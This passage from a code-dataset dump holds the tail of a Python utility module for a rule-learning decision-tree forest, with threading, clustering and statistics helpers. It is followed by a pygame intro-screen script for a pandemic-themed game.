polar\r\n self.raw_rule_approveprobability = None\r\n if type(metainfo.paras.raw_rule_approveprobability) == list:\r\n self.raw_rule_approveprobability = metainfo.paras.raw_rule_approveprobability[self.polar]\r\n else:\r\n self.raw_rule_approveprobability = metainfo.paras.raw_rule_approveprobability\r\n self.weight = weight\r\n self.probability = probability\r\n self.confidence_coefficient = confidence_coefficient\r\n self.premilinary_condition_predicates = premilinary_condition_predicates\r\n self.nondirectional_map = nondirectional_map\r\n self.conform_map = conform_map\r\n self.trees = [None] * self.splitter_count\r\n self.rules = [None] * self.splitter_count\r\n self.roottrees = roottrees\r\n if self.roottrees == None:\r\n self.roottrees = range(0, self.splitter_count)\r\n self.generatetrees()\r\n\r\n def generatetrees(self):\r\n for each_splitter_index in self.roottrees:\r\n 
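# grow one candidate tree per root splitter; each tree's rules are collected and ranked by criterion strength below\r\n                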
self.trees[each_splitter_index] = runtime.forest.tree(self, each_splitter_index)\r\n self.rules[each_splitter_index] = self.trees[each_splitter_index].rules\r\n self.rules[each_splitter_index].sort(key=lambda x:x.criterion, reverse=True)\r\n\r\n class table:\r\n\r\n def __init__(self, fullmap, submap_indtrans, splitterindex, labelindex):\r\n self.splitter_map = np.array(fullmap[submap_indtrans.subindexes[0], splitterindex]).reshape(-1, 1)\r\n self.label_map = np.array(fullmap[submap_indtrans.subindexes[0], labelindex]).reshape(-1, 1)\r\n self.labeled_indtrans = np.where(np.logical_and(np.logical_or(self.label_map == 0, self.label_map == 1), self.splitter_map != metainfo.top.NONE_VALUE))\r\n self.unlabeled_indtrans = np.where(np.logical_and(self.label_map == metainfo.top.INDETERMINATE, self.splitter_map != metainfo.top.NONE_VALUE))\r\n self.labeled_indtrans = runtime.indexes_transformer(submap_indtrans.fullindexes(self.labeled_indtrans))\r\n self.unlabeled_indtrans = runtime.indexes_transformer(submap_indtrans.fullindexes(self.unlabeled_indtrans))\r\n self.splitter_map_labeled = np.array(fullmap[self.labeled_indtrans.subindexes[0], splitterindex]).reshape(-1, 1)\r\n self.splitter_map_unlabeled = np.array(fullmap[self.unlabeled_indtrans.subindexes[0], splitterindex]).reshape(-1, 1)\r\n self.label_map_labeled = np.array(fullmap[self.labeled_indtrans.subindexes[0], labelindex]).reshape(-1, 1)\r\n self.label_map_unlabeled = np.array(fullmap[self.unlabeled_indtrans.subindexes[0], labelindex]).reshape(-1, 1)\r\n\r\n class tree:\r\n\r\n def __init__(self, forest, root_splitter_index):\r\n self.forest = forest\r\n self.root_splitter_index = root_splitter_index\r\n self.map = self.forest.map\r\n self.nondirectional_map = self.forest.nondirectional_map\r\n self.conform_map = self.forest.conform_map\r\n self.labelindex = self.forest.labelindex\r\n self.polar = self.forest.polar\r\n self.rules = []\r\n self.split(depth_splitters=[], splitter_index=self.root_splitter_index, pre_predicates=[], pre_mainmap_indtrans=runtime.op_index_colon, pre_nondirectional_indtrans=runtime.op_index_colon, pre_conform_indtrans=runtime.op_index_colon)\r\n\r\n class rule:\r\n def __init__(self, predicates, premilinary_condition_predicates, polareffective, criterion, weight, stat_probability, confidence_coefficient, labeled_indexes, unlabeled_indexes, map_indtrans, nondirectional_labeled_indexes, nondirectional_indtrans, conform_labeled_indexes, conform_unlabeled_indexes, conform_indtrans):\r\n self.predicates = None\r\n if premilinary_condition_predicates != None:\r\n self.predicates = runtime.predicate.combine(premilinary_condition_predicates + predicates)\r\n else:\r\n self.predicates = predicates\r\n self.predicates = runtime.hashableset(self.predicates)\r\n self.predicatedisplays = ''\r\n self.gml = None\r\n self.criterion = criterion\r\n self.polareffective = polareffective\r\n if self.polareffective == True:\r\n assert(self.criterion >= 0)\r\n self.weight = weight\r\n self.stat_probability = stat_probability\r\n self.confidence_coefficient = confidence_coefficient\r\n self.polar = runtime.probabilitypolar(self.stat_probability)\r\n self.labeled_indexes = labeled_indexes\r\n self.unlabeled_indexes = unlabeled_indexes\r\n self.map_indtrans = map_indtrans\r\n self.nondirectional_labeled_indexes = nondirectional_labeled_indexes\r\n self.nondirectional_indtrans = nondirectional_indtrans\r\n self.conform_labeled_indexes = conform_labeled_indexes\r\n self.conform_unlabeled_indexes = conform_unlabeled_indexes\r\n 
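# the *_indtrans transformers map this rule's local row indices back to rows of the corresponding full maps\r\n                    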
self.conform_indtrans = conform_indtrans\r\n self.formfeature = runtime.hashableset()\r\n for each_predicate in self.predicates:\r\n self.formfeature.add(each_predicate.feature)\r\n self.resolution = len(self.labeled_indexes) + len(self.unlabeled_indexes)\r\n if self.nondirectional_labeled_indexes != None:\r\n self.resolution += len(self.nondirectional_labeled_indexes)\r\n if self.conform_labeled_indexes != None and self.conform_unlabeled_indexes != None:\r\n self.resolution += (len(self.conform_labeled_indexes) + len(self.conform_unlabeled_indexes))\r\n\r\n def split(self, depth_splitters, splitter_index, pre_predicates, pre_mainmap_indtrans, pre_nondirectional_indtrans, pre_conform_indtrans):\r\n depth_splitters.append(splitter_index)\r\n if pre_mainmap_indtrans == runtime.op_index_colon:\r\n pre_mainmap_indtrans = runtime.indexes_transformer(tuple([list(range(0, self.map.shape[0])), [0] * self.map.shape[0]]))\r\n mainmap_table = runtime.forest.table(fullmap=self.map, submap_indtrans=pre_mainmap_indtrans, splitterindex=splitter_index, labelindex=self.labelindex)\r\n pre_labeled_splittermap = mainmap_table.splitter_map_labeled\r\n pre_unlabeled_splittermap = mainmap_table.splitter_map_unlabeled\r\n pre_labeled_labelmap = mainmap_table.label_map_labeled\r\n pre_unlabeled_labelmap = mainmap_table.label_map_unlabeled\r\n pre_labeled_indtrans = mainmap_table.labeled_indtrans\r\n pre_unlabeled_indtrans = mainmap_table.unlabeled_indtrans\r\n nondirectional_pre_labeled_splittermap = None\r\n nondirectional_pre_labeled_labelmap = None\r\n nondirectional_pre_labeled_indtrans = None\r\n if runtime.isNone(self.nondirectional_map) == False and pre_nondirectional_indtrans != None:\r\n if pre_nondirectional_indtrans == runtime.op_index_colon:\r\n pre_nondirectional_indtrans = runtime.indexes_transformer(tuple([list(range(0, self.nondirectional_map.shape[0])), [0] * self.nondirectional_map.shape[0]]))\r\n if runtime.isArrayEmpty(pre_nondirectional_indtrans.subindexes) == False:\r\n nondirectionalmap_table = runtime.forest.table(fullmap=self.nondirectional_map, submap_indtrans=pre_nondirectional_indtrans, splitterindex=splitter_index, labelindex=self.labelindex)\r\n nondirectional_pre_labeled_splittermap = nondirectionalmap_table.splitter_map_labeled\r\n nondirectional_pre_labeled_labelmap = nondirectionalmap_table.label_map_labeled\r\n nondirectional_pre_labeled_indtrans = nondirectionalmap_table.labeled_indtrans\r\n conform_pre_labeled_splittermap = None\r\n conform_pre_unlabeled_splittermap = None\r\n conform_pre_labeled_labelmap = None\r\n conform_pre_unlabeled_labelmap = None\r\n conform_pre_labeled_indtrans = None\r\n conform_pre_unlabeled_indtrans = None\r\n if runtime.isNone(self.conform_map) == False and pre_conform_indtrans != None:\r\n if pre_conform_indtrans == runtime.op_index_colon:\r\n pre_conform_indtrans = runtime.indexes_transformer(tuple([list(range(0, self.conform_map.shape[0])), [0] * self.conform_map.shape[0]]))\r\n if runtime.isArrayEmpty(pre_conform_indtrans.subindexes) == False:\r\n conformmap_table = runtime.forest.table(fullmap=self.conform_map, submap_indtrans=pre_conform_indtrans, splitterindex=splitter_index, labelindex=self.labelindex)\r\n conform_pre_labeled_splittermap = conformmap_table.splitter_map_labeled\r\n conform_pre_unlabeled_splittermap = conformmap_table.splitter_map_unlabeled\r\n conform_pre_labeled_labelmap = conformmap_table.label_map_labeled\r\n conform_pre_unlabeled_labelmap = conformmap_table.label_map_unlabeled\r\n conform_pre_labeled_indtrans = 
conformmap_table.labeled_indtrans\r\n conform_pre_unlabeled_indtrans = conformmap_table.unlabeled_indtrans\r\n splitvalues = list(set(pre_labeled_splittermap.ravel()))\r\n splitvalues.sort(reverse=False)\r\n previoussplitvalue = (-1) * math.inf\r\n for eachsplitvalue in list(splitvalues):\r\n if eachsplitvalue - previoussplitvalue < metainfo.paras.tree_split_significantdelta:\r\n splitvalues.remove(eachsplitvalue)\r\n else:\r\n previoussplitvalue = eachsplitvalue\r\n assert(metainfo.top.NONE_VALUE not in splitvalues)\r\n # Avoid complete or sub-complete redundant selection predicates.\r\n splitvalues = runtime.completeset_redundant(splitvalues, self.polar)\r\n optimal_criterion = (-1) * math.inf\r\n optimal_rule_split = None\r\n if self.polar == 1:\r\n splitvalues.sort(reverse=True)\r\n for eachsplitvalue in splitvalues:\r\n currentrule = self.criterion(splitter_index, eachsplitvalue, pre_labeled_splittermap, pre_unlabeled_splittermap, pre_labeled_labelmap, pre_unlabeled_labelmap, pre_labeled_indtrans, pre_unlabeled_indtrans, pre_predicates, nondirectional_pre_labeled_splittermap, nondirectional_pre_labeled_labelmap, nondirectional_pre_labeled_indtrans, conform_pre_labeled_splittermap, conform_pre_unlabeled_splittermap, conform_pre_labeled_labelmap, conform_pre_unlabeled_labelmap, conform_pre_labeled_indtrans, conform_pre_unlabeled_indtrans)\r\n if currentrule.criterion >= optimal_criterion:\r\n optimal_rule_split = currentrule\r\n if currentrule.polareffective == False:\r\n break\r\n if optimal_rule_split != None:\r\n if optimal_rule_split.polareffective == True:\r\n self.rules.append(optimal_rule_split)\r\n if (metainfo.paras.tree_tridepth_exhausted == True or optimal_rule_split.polareffective == False) and len(depth_splitters) < metainfo.paras.tree_maxdepth:\r\n for each_next_splitter in range(0, self.forest.splitter_count):\r\n if each_next_splitter not in depth_splitters:\r\n self.split(depth_splitters=list(depth_splitters), splitter_index=each_next_splitter, pre_predicates=optimal_rule_split.predicates, pre_mainmap_indtrans=optimal_rule_split.map_indtrans, pre_nondirectional_indtrans=optimal_rule_split.nondirectional_indtrans, pre_conform_indtrans=optimal_rule_split.conform_indtrans)\r\n\r\n def criterion(self, splitter_index, splitvalue, pre_labeled_splittermap, pre_unlabeled_splittermap, pre_labeled_labelmap, pre_unlabeled_labelmap, pre_labeled_indtrans, pre_unlabeled_indtrans, pre_predicates, nondirectional_pre_labeled_splittermap, nondirectional_pre_labeled_labelmap, nondirectional_pre_labeled_indtrans, conform_pre_labeled_splittermap, conform_pre_unlabeled_splittermap, conform_pre_labeled_labelmap, conform_pre_unlabeled_labelmap, conform_pre_labeled_indtrans, conform_pre_unlabeled_indtrans):\r\n from source.rule import confidence\r\n labeled_indexes = None\r\n unlabeled_indexes = None\r\n nondirectional_labeled_indexes = None\r\n conform_labeled_indexes = None\r\n conform_unlabeled_indexes = None\r\n if self.polar == 0:\r\n labeled_indexes = np.where(pre_labeled_splittermap <= splitvalue)\r\n unlabeled_indexes = np.where(pre_unlabeled_splittermap <= splitvalue)\r\n if runtime.isNone(nondirectional_pre_labeled_splittermap) == False:\r\n nondirectional_labeled_indexes = np.where(nondirectional_pre_labeled_splittermap <= splitvalue)\r\n if runtime.isNone(conform_pre_labeled_splittermap) == False:\r\n conform_labeled_indexes = np.where(conform_pre_labeled_splittermap <= splitvalue)\r\n conform_unlabeled_indexes = np.where(conform_pre_unlabeled_splittermap <= splitvalue)\r\n 
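# polar == 1 mirrors the branch above: rows at or above the split value are selected instead\r\n                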
else:\r\n labeled_indexes = np.where(pre_labeled_splittermap >= splitvalue)\r\n unlabeled_indexes = np.where(pre_unlabeled_splittermap >= splitvalue)\r\n if runtime.isNone(nondirectional_pre_labeled_splittermap) == False:\r\n nondirectional_labeled_indexes = np.where(nondirectional_pre_labeled_splittermap >= splitvalue)\r\n if runtime.isNone(conform_pre_labeled_splittermap) == False:\r\n conform_labeled_indexes = np.where(conform_pre_labeled_splittermap >= splitvalue)\r\n conform_unlabeled_indexes = np.where(conform_pre_unlabeled_splittermap >= splitvalue)\r\n labeled_labels = pre_labeled_labelmap[labeled_indexes]\r\n unlabeled_labels = pre_unlabeled_labelmap[unlabeled_indexes]\r\n nondirectional_labeled_labels = []\r\n if runtime.isNone(nondirectional_pre_labeled_splittermap) == False:\r\n nondirectional_labeled_labels = nondirectional_pre_labeled_labelmap[nondirectional_labeled_indexes]\r\n labeled_indexes = pre_labeled_indtrans.fullindexes(labeled_indexes)\r\n unlabeled_indexes = pre_unlabeled_indtrans.fullindexes(unlabeled_indexes)\r\n map_indexes = runtime.indexes_transformer.combine([labeled_indexes, unlabeled_indexes])\r\n assert(set(map_indexes[1]) == set([0]) or set(map_indexes[1]) == set())\r\n map_indexes[0].sort(reverse=False)\r\n map_indtrans = runtime.indexes_transformer(map_indexes)\r\n nondirectional_indtrans = None\r\n if runtime.isNone(nondirectional_pre_labeled_splittermap) == False:\r\n nondirectional_labeled_indexes = nondirectional_pre_labeled_indtrans.fullindexes(nondirectional_labeled_indexes)\r\n nondirectional_indexes = nondirectional_labeled_indexes\r\n nondirectional_indtrans = runtime.indexes_transformer(nondirectional_indexes)\r\n conform_indtrans = None\r\n if runtime.isNone(conform_pre_labeled_splittermap) == False:\r\n conform_labeled_indexes = conform_pre_labeled_indtrans.fullindexes(conform_labeled_indexes)\r\n conform_unlabeled_indexes = conform_pre_unlabeled_indtrans.fullindexes(conform_unlabeled_indexes)\r\n conform_indexes = runtime.indexes_transformer.combine([conform_labeled_indexes, conform_unlabeled_indexes])\r\n assert(set(conform_indexes[1]) == set([0]) or set(conform_indexes[1]) == set())\r\n conform_indexes[0].sort(reverse=False)\r\n conform_indtrans = runtime.indexes_transformer(conform_indexes)\r\n label1count = sum(labeled_labels) + sum(nondirectional_labeled_labels)\r\n label0count = len(labeled_labels) + len(nondirectional_labeled_labels) - label1count\r\n probability = self.forest.probability(balance=self.forest.balance, label1count=label1count, label0count=label0count)\r\n polareffective_skylinecoverage = None\r\n if self.polar == 0:\r\n polareffective_skylinecoverage = len(labeled_labels) - sum(labeled_labels)\r\n else:\r\n polareffective_skylinecoverage = sum(labeled_labels)\r\n rulearea = confidence.subarea(polar=self.polar, func_probability=self.forest.probability, subarea_pairs=None, label_pairs=None)\r\n rulearea.labeledcount = label0count + label1count\r\n rulearea.totalcount = label0count + label1count + len(unlabeled_indexes[0])\r\n confidence_coefficient = self.forest.confidence_coefficient(func_probability=self.forest.probability, subareas=rulearea)\r\n polareffective_weight = self.forest.weight(confidence_coefficient=1, balanceprobability=probability, polar=self.polar)\r\n polareffective = runtime.probabilitypolar(probability) == self.polar and confidence.effective(polareffective_weight, effectiveprobability=self.forest.raw_rule_approveprobability, effectiveweight=None)\r\n #weight = 
self.forest.weight(confidence_coefficient=confidence_coefficient, balanceprobability=probability, polar=self.polar)\r\n weight = polareffective_weight\r\n criterion = (-1) * math.inf\r\n if weight != None:\r\n criterion = math.fabs(weight)\r\n op = None\r\n if self.polar == 0:\r\n op = runtime.predicate.op.lesseq\r\n else:\r\n op = runtime.predicate.op.largereq\r\n predicates = list(pre_predicates)\r\n split_predicate = runtime.predicate(feature=self.forest.splitters[splitter_index], op=op, value=splitvalue)\r\n predicates.append(split_predicate)\r\n predicates = runtime.predicate.combine(predicates)\r\n therule = runtime.forest.tree.rule(predicates=predicates, premilinary_condition_predicates=self.forest.premilinary_condition_predicates, polareffective=polareffective, criterion=criterion, weight=weight, stat_probability=probability, confidence_coefficient=confidence_coefficient, labeled_indexes=labeled_indexes, unlabeled_indexes=unlabeled_indexes, map_indtrans=map_indtrans, nondirectional_labeled_indexes=nondirectional_labeled_indexes, nondirectional_indtrans=nondirectional_indtrans, conform_labeled_indexes=conform_labeled_indexes, conform_unlabeled_indexes=conform_unlabeled_indexes, conform_indtrans=conform_indtrans)\r\n return therule\r\n\r\n @staticmethod\r\n def asyncraise(tid, exctype = SystemExit):\r\n try:\r\n \"\"\"raises the exception, performs cleanup if needed\"\"\"\r\n tid = tid.ident\r\n tid = ctypes.c_long(tid)\r\n if not inspect.isclass(exctype):\r\n exctype = type(exctype)\r\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))\r\n if res == 0:\r\n raise ValueError(\"invalid thread id\")\r\n elif res != 1:\r\n # \"\"\"if it returns a number greater than one, you're in trouble,\r\n # and you should call it again with exc=NULL to revert the effect\"\"\"\r\n ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\r\n raise SystemError(\"PyThreadState_SetAsyncExc failed\")\r\n except Exception as e:\r\n runtime.console('Error > asyncraise tid: ' + str(tid), repr(e), runtime.console.styles.EXCEPTION)\r\n traceback.print_exc()\r\n\r\n class countdown:\r\n\r\n def __init__(self, t, info, prompt = None, period = 1):\r\n self.t = max(0, t)\r\n self.info = str(info)\r\n self.thread = None\r\n self.prompt = prompt\r\n self.period = period\r\n\r\n def perform(self):\r\n while self.t >= 0:\r\n mins, secs = divmod(self.t, 60)\r\n timer = runtime.console.color.BACKGROUND + '\\r' + self.info + ' in {:02d}:{:02d}'.format(mins, secs) + runtime.console.color.END\r\n if self.prompt != None:\r\n timer += (' >> ' + str(self.prompt) + ' :> ')\r\n sys.stdout.write(timer)\r\n sys.stdout.flush()\r\n time.sleep(self.period)\r\n self.t -= self.period\r\n\r\n def async_perform(self):\r\n self.thread = Thread(target=self.perform, args=())\r\n self.thread.start()\r\n\r\n def exit(self):\r\n self.t = (-1) * math.inf\r\n runtime.asyncraise(self.thread)\r\n\r\n\r\n class Thread_ReturnValue():\r\n\r\n def __init__(self):\r\n self.result = []\r\n\r\n @staticmethod\r\n def awaitinput(default, t, info, prompt = None, period = 1):\r\n def input_ReturnValue(Thread_ReturnValue):\r\n Thread_ReturnValue.result.append(input())\r\n def skipinput(inputthread,Thread_ReturnValue,default):\r\n runtime.asyncraise(inputthread)\r\n Thread_ReturnValue.result.append(default)\r\n Thread_ReturnValue.result.append(default)\r\n theinput = None\r\n Thread_ReturnValue = runtime.Thread_ReturnValue()\r\n inputthread = Thread(target=input_ReturnValue, args=(Thread_ReturnValue,))\r\n timer = Timer(t, 
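# when the countdown lapses, skipinput() kills the blocked input() thread via asyncraise and substitutes the default answer\r\n            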
skipinput, args=(inputthread,Thread_ReturnValue,default))\r\n        timer.start()\r\n        cd = runtime.countdown(t, info, prompt, period)\r\n        cd.async_perform()\r\n        inputthread.start()\r\n        inputthread.join(t + 1)\r\n        timer.cancel()\r\n        cd.exit()\r\n        if len(Thread_ReturnValue.result) == 1:\r\n            if len(Thread_ReturnValue.result[0]) > 0:\r\n                print('awaitinput =?', Thread_ReturnValue.result[0])\r\n                cert = input('awaitinput :> ')\r\n                if len(cert) != 0:\r\n                    Thread_ReturnValue.result[0] = cert\r\n                else:\r\n                    Thread_ReturnValue.result[0] = default\r\n            else:\r\n                print()\r\n        theinput = Thread_ReturnValue.result[0]\r\n        print('awaitinput :=', theinput)\r\n        return theinput\r\n\r\n    @staticmethod\r\n    def digit(number):\r\n        # number of decimal digits (returns 0 for 0)\r\n        thedigit = 0\r\n        while number != 0:\r\n            number = int(number/10)\r\n            thedigit += 1\r\n        return thedigit\r\n\r\n    class nlp:\r\n        # Anti Token-Sparse problem fundamentally, instead of using the Training-Test split's seeming trick.\r\n\r\n        def __init__(self, regulartokens, attributed_sentences):\r\n            iter = 10\r\n            workercount = cpu_count() / 2\r\n            if workercount % 2 == 1:\r\n                workercount *= 2\r\n                workercount -= 2\r\n            if workercount > 12:\r\n                workercount = 12\r\n            elif workercount < 2:\r\n                workercount = 2\r\n            workercount = int(workercount)\r\n            self.wordlist = list(regulartokens)\r\n            runtime.console('SGML > w2groups anti-sparse', str(len(self.wordlist)) + ' sentences processing, # multi-threads = ' + str(workercount) + ' / ' + str(cpu_count()) + ' ...', runtime.console.styles.INFO)\r\n            self.wordvectors = []\r\n            if attributed_sentences == None:\r\n                self.model = None\r\n            else:\r\n                self.model = fasttext.FastText(attributed_sentences, min_count=1, workers=workercount, iter=iter)\r\n                for each_regulartoken in self.wordlist:\r\n                    self.wordvectors.append(self.model.wv[each_regulartoken])\r\n            conv_test_exp_multiplier = runtime.digit(len(self.wordvectors)) - 1\r\n            conv_test = math.pow(10, conv_test_exp_multiplier) * 1e-9\r\n            conv_test_print = -9 + conv_test_exp_multiplier\r\n            runtime.console('SGML > w2groups anti-sparse', 'nltk :: KMeansClusterer clustering conv_threshold = 1e' + str(conv_test_print) + ' ... 
take times ...', runtime.console.styles.INFO)\r\n self.wordcluster = KMeansClusterer(metainfo.paras.nlpw2vgroups, distance=nltk.cluster.util.cosine_distance, repeats=iter, conv_test=conv_test, avoid_empty_clusters=True)\r\n self.assigned_clusters = self.wordcluster.cluster(self.wordvectors, assign_clusters=True)\r\n self.w2groups = {}\r\n for eachindex in range(0, len(self.wordlist)):\r\n eachword = self.wordlist[eachindex]\r\n self.w2groups[eachword] = self.assigned_clusters[eachindex]\r\n\r\n @staticmethod\r\n def confidentialsample(priorp, error, n_, N, P=None):\r\n if P == None:\r\n if n_ == N:\r\n return 1\r\n else:\r\n n = None\r\n if N != None:\r\n n = int(float(N - 1)/(N - n_) * n_)\r\n else:\r\n n = n_\r\n t = math.sqrt((float(n) * math.pow(error, 2))/(priorp * (1 - priorp)))\r\n P = stats.norm.cdf(t)\r\n return 1 - (1 - P) * 2\r\n else:\r\n t = stats.norm.ppf(1 - (1 - P)/2)\r\n n = int(math.pow(t,2) * priorp * (1 - priorp)/math.pow(error, 2))\r\n n_ = math.ceil(float(n)/(1 + float(1 + n)/N))\r\n return n_\r\n\r\n @staticmethod\r\n def issorted(iter, reverse):\r\n if reverse == False:\r\n return all([iter[i] <= iter[i + 1] for i in range(len(iter) - 1)])\r\n else:\r\n return all([iter[i] >= iter[i + 1] for i in range(len(iter) - 1)])\r\n\r\n @staticmethod\r\n @jit\r\n def recombination_jit(iter1, iter2, lenlimit, len1, len2):\r\n therecombination_jit = []\r\n for eachlenlimit1 in len1:\r\n for eachlenlimit2 in len2:\r\n combination1 = list()\r\n combination2 = list()\r\n for eachcombination1 in itertools.combinations(iter1, eachlenlimit1):\r\n combination1.append(set(eachcombination1))\r\n for eachcombination2 in itertools.combinations(iter2, eachlenlimit2):\r\n combination2.append(set(eachcombination2))\r\n for eachproductset in itertools.product(combination1, combination2):\r\n thisrecombination = set(eachproductset[0])\r\n thisrecombination.update(eachproductset[1])\r\n if len(thisrecombination) <= lenlimit and thisrecombination.issubset(iter1) == False and thisrecombination.issubset(iter2) == False:\r\n therecombination_jit.append(thisrecombination)\r\n return therecombination_jit\r\n\r\n @staticmethod\r\n def recombination(iter1, iter2, lenlimit, semisub, processed_cache):\r\n if (iter1, iter2) in processed_cache or (iter2, iter1) in processed_cache:\r\n return None\r\n len1 = None\r\n len2 = None\r\n if semisub == True:\r\n len1 = [max(int(len(iter1) / 2), 1)]\r\n len2 = [max(int(len(iter2) / 2), 1)]\r\n else:\r\n len1 = range(1, len(iter1) + 1)\r\n len2 = range(1, len(iter2) + 1)\r\n numba_coded = (range(0, len(iter1)), range(len(iter1), len(iter1) + len(iter2)))\r\n therecombination_jit = None\r\n if numba_coded in processed_cache:\r\n therecombination_jit = processed_cache[numba_coded]\r\n else:\r\n therecombination_jit = runtime.recombination_jit(range(0, len(iter1)), range(len(iter1), len(iter1) + len(iter2)), lenlimit, len1, len2)\r\n processed_cache[numba_coded] = therecombination_jit\r\n processed_cache[(iter1, iter2)] = metainfo.top.AUTO\r\n iter = list(iter1)\r\n iter += list(iter2)\r\n therecombination = set()\r\n for eachcombination_jit in therecombination_jit:\r\n currentcombination = []\r\n for eachindex in eachcombination_jit:\r\n currentcombination.append(iter[eachindex])\r\n currentcombination = runtime.hashableset(runtime.predicate.combine(currentcombination))\r\n if runtime.predicate.issmallerthan(currentcombination, iter1) == False and runtime.predicate.issmallerthan(currentcombination, iter2) == False:\r\n therecombination.add(currentcombination)\r\n 
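# only recombinations that are not subsumed by either parent predicate set survive\r\n        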
return therecombination\r\n\r\n @staticmethod\r\n def display(header, space, dictcontent=None):\r\n if dictcontent == None:\r\n displaystr = ''\r\n for eachvindex in range(0, len(header)):\r\n currentv = header[eachvindex]\r\n currentv = str(currentv)\r\n displaystr += currentv\r\n displaystr += ' ' * (space[eachvindex] - len(currentv))\r\n return displaystr\r\n else:\r\n if type(dictcontent) != list:\r\n dictcontent = [dictcontent] * len(header)\r\n displaydict = {}\r\n for eachvindex in range(0, len(header)):\r\n currentv = header[eachvindex]\r\n currentv = str(currentv)\r\n displaydict[currentv] = str(dictcontent[eachvindex])\r\n return displaydict\r\n\r\n @staticmethod\r\n def dellist(thelist, delindexes):\r\n return [thelist[i] for i in range(0, len(thelist)) if i not in delindexes]\r\n\r\n @staticmethod\r\n def fitprobability(labellist, polar, balance1_multiplier):\r\n labellist = np.array(labellist, dtype=np.int64)\r\n labellist = np.fabs(1 - polar - labellist)\r\n labellist = labellist.astype(np.int64)\r\n totalmass = None\r\n if balance1_multiplier != None:\r\n balancer = None\r\n if polar == 0:\r\n balancer = float(1) / balance1_multiplier\r\n else:\r\n balancer = balance1_multiplier\r\n bincount = np.bincount(labellist)\r\n labellist = labellist.astype(np.float64)\r\n labellist *= balancer\r\n totalmass = balancer * bincount[1] + bincount[0]\r\n else:\r\n totalmass = len(labellist)\r\n fitness = float(np.sum(labellist)) / totalmass\r\n return fitness\r\n\r\n @staticmethod\r\n def setcompare(set_1, set_2, method):\r\n if method == 'distinct':\r\n return len(set_1 - set_2)\r\n elif method == 'jaccard':\r\n intersection = set_1.intersection(set_2)\r\n union = set_1.union(set_2)\r\n return float(len(intersection)) / len(union)\r\n\r\n @staticmethod\r\n def sortbased(aim, score, reverse):\r\n if reverse == False:\r\n return np.array(aim)[np.argsort(score)], np.array(score)[np.argsort(score)]\r\n else:\r\n return np.array(aim)[np.argsort(np.array(score) * (-1))], np.array(score)[np.argsort(np.array(score) * (-1))]\r\n\r\n class minmax:\r\n def __init__(self, min, max):\r\n self.min = min\r\n self.max = max\r\n\r\n @staticmethod\r\n def cmp(x, y):\r\n if x < y:\r\n return -1\r\n elif x > y:\r\n return 1\r\n else:\r\n return 0\r\n\r\n @staticmethod\r\n def cmp_reverse(x, y):\r\n if x < y:\r\n return 1\r\n elif x > y:\r\n return -1\r\n else:\r\n return 0\r\n\r\n @staticmethod\r\n def sidesort(sortaim):\r\n i = np.array(range(0, len(sortaim)))\r\n mid = 0.5 * (i[0] + i[-1])\r\n x = - np.fabs(i - mid)\r\n xs = np.argsort(x)\r\n return xs, np.array(sortaim)[xs].tolist()","repo_name":"wailler/ActiveGML","sub_path":"source/runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":116157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72203129767","text":"import os\nimport pygame\nfrom constants import BACKGROUND, screen,SCREEN_WIDTH, SCREEN_HEIGHT\nfrom pygame import mixer\n\ndef intro(clock,screen):\n\n game_icon=pygame.image.load(os.path.join('assets','icon.png'))\n pygame.display.set_icon(game_icon)\n pygame.display.set_caption('QUARENTINE: THE PANDEMIC GAME')\n\n\n mixer.music.load(os.path.join('assets','alexander-nakarada-chase.ogg'))\n mixer.music.play(-1)\n\n for i in range(1,20):\n clock.tick(20)\n if i<10:\n image='ezgif-frame-00{}.png'.format(str(i))\n else:\n image='ezgif-frame-0{}.png'.format(str(i))\n image=pygame.image.load(os.path.join('assets','Intro I', image))\n image=pygame.transform.scale(image, 
(SCREEN_WIDTH, SCREEN_HEIGHT))\n        screen.blit(image, (0, 0))\n        pygame.display.update()\n\n    for i in range(1,51):\n        clock.tick(100)\n        if i<10:\n            image='ezgif-frame-00{}.png'.format(str(i))\n        else:\n            image='ezgif-frame-0{}.png'.format(str(i))\n        image=pygame.image.load(os.path.join('assets','Intro II', image))\n        image=pygame.transform.scale(image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n        screen.blit(image, (0, 0))\n        pygame.display.update()\n\n    background = pygame.Surface(screen.get_size())\n    background = background.convert()\n\n    for i in range(0,15):\n        clock.tick(20)\n        possibleColors=[(250, 250, 250),(250, 0, 0),(0, 0, 0)]\n        background.fill(possibleColors[i%3])\n        screen.blit(background, (0, 0))\n        pygame.display.update()\n\n    start=False\n    while(not start):\n        clock.tick(10)\n        image=pygame.image.load(os.path.join('assets','Quarantine The Pandemic Game.png'))\n        image=pygame.transform.scale(image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n        screen.blit(image, (0, 0))\n        pygame.display.update()\n        for event in pygame.event.get():\n            if event.type == pygame.MOUSEBUTTONUP:\n                x,y=pygame.mouse.get_pos()\n                if x>=600*SCREEN_WIDTH/1600 and x<=880*SCREEN_WIDTH/1600:\n                    if y>=710*SCREEN_HEIGHT/900 and y<=830*SCREEN_HEIGHT/900:\n                        start=True\n            if event.type == pygame.QUIT:\n                pygame.quit()\n                # stop cleanly; pygame calls after quit() would raise an error\n                raise SystemExit\n    for i in range(1,126):\n        if i==22:\n            clock.tick(0.5)\n        elif i==47:\n            clock.tick(0.5)\n        elif i==73:\n            clock.tick(0.5)\n        elif i==96:\n            clock.tick(0.2)\n        else:\n            clock.tick(15)\n        if i<10:\n            image='ezgif-frame-00{}.png'.format(str(i))\n        elif i<100:\n            image='ezgif-frame-0{}.png'.format(str(i))\n        else:\n            image='ezgif-frame-{}.png'.format(str(i))\n        image=pygame.image.load(os.path.join('assets','Inicio do Jogo', image))\n        image=pygame.transform.scale(image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n        screen.blit(image, (0, 0))\n        pygame.display.update()\n\n\n    ","repo_name":"davixie/CES22_PlantsVsZombies","sub_path":"intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
